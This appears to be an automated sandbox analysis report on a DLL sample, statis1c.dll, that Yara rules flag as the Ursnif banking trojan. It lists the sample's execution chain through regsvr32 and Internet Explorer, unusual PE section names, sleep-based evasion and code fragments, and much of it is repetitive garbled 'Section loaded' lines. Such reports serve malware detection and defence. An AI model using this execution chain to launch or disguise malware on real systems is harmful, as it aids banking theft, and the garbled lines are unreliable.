            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: classification engineClassification label: mal76.bank.troj.winDLL@13/126@10/3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011256A2 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_011256A2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4B16642D-3EEF-11EB-90E5-ECF4BB570DC9}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF3ED0576C11E39A8.TMPJump to behavior
            Source: statis1c.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: statis1c.dllVirustotal: Detection: 11%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\statis1c.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\statis1c.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82970 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\statis1c.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17418 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82970 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: statis1c.dllStatic PE information: real checksum: 0x2e2e0 should be: 0x2add9
            Source: statis1c.dllStatic PE information: section name:
            Source: statis1c.dllStatic PE information: section name: .electro
            Source: statis1c.dllStatic PE information: section name: .socker
            Source: statis1c.dllStatic PE information: section name: .deceivi
            Source: statis1c.dllStatic PE information: section name: .vedro
            Source: statis1c.dllStatic PE information: section name: .obstrep
            Source: statis1c.dllStatic PE information: section name: .br
            Source: statis1c.dllStatic PE information: section name: .es
            Source: statis1c.dllStatic PE information: section name: .lunaria
            Source: statis1c.dllStatic PE information: section name: .droopin
            Source: statis1c.dllStatic PE information: section name: .cal
            Source: statis1c.dllStatic PE information: section name: .fingers
            Source: statis1c.dllStatic PE information: section name: .scotomy
            Source: statis1c.dllStatic PE information: section name: .lienter
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\statis1c.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004021C3 push ecx; ret 1_2_004021D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00402170 push ecx; ret 1_2_00402179
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0112AD10 push ecx; ret 1_2_0112AD19
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0112B0CB push ecx; ret 1_2_0112B0DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF009C push dword ptr [ebp-000000D8h]; ret 1_2_00DF0252
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF009C push dword ptr [ebp-000000E0h]; ret 1_2_00DF029C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF009C push dword ptr [esp+10h]; ret 1_2_00DF03AB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF03AC push dword ptr [esp+0Ch]; ret 1_2_00DF03BF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF03AC push dword ptr [esp+10h]; ret 1_2_00DF0404
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF0066 push dword ptr [ebp-000000D8h]; ret 1_2_00DF009B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF0005 push dword ptr [ebp-000000D8h]; ret 1_2_00DF0065

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5664, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4408Thread sleep count: 264 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4408Thread sleep time: -132000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011232BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_011232BA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF009C mov eax, dword ptr fs:[00000030h]1_2_00DF009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF03AC mov eax, dword ptr fs:[00000030h]1_2_00DF03AC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF0476 mov eax, dword ptr fs:[00000030h]1_2_00DF0476
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: regsvr32.exe, 00000001.00000002.602946142.00000000035D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.602946142.00000000035D0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.602946142.00000000035D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: regsvr32.exe, 00000001.00000002.602946142.00000000035D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: regsvr32.exe, 00000001.00000002.602946142.00000000035D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011293D5 cpuid 1_2_011293D5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004010FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_004010FC
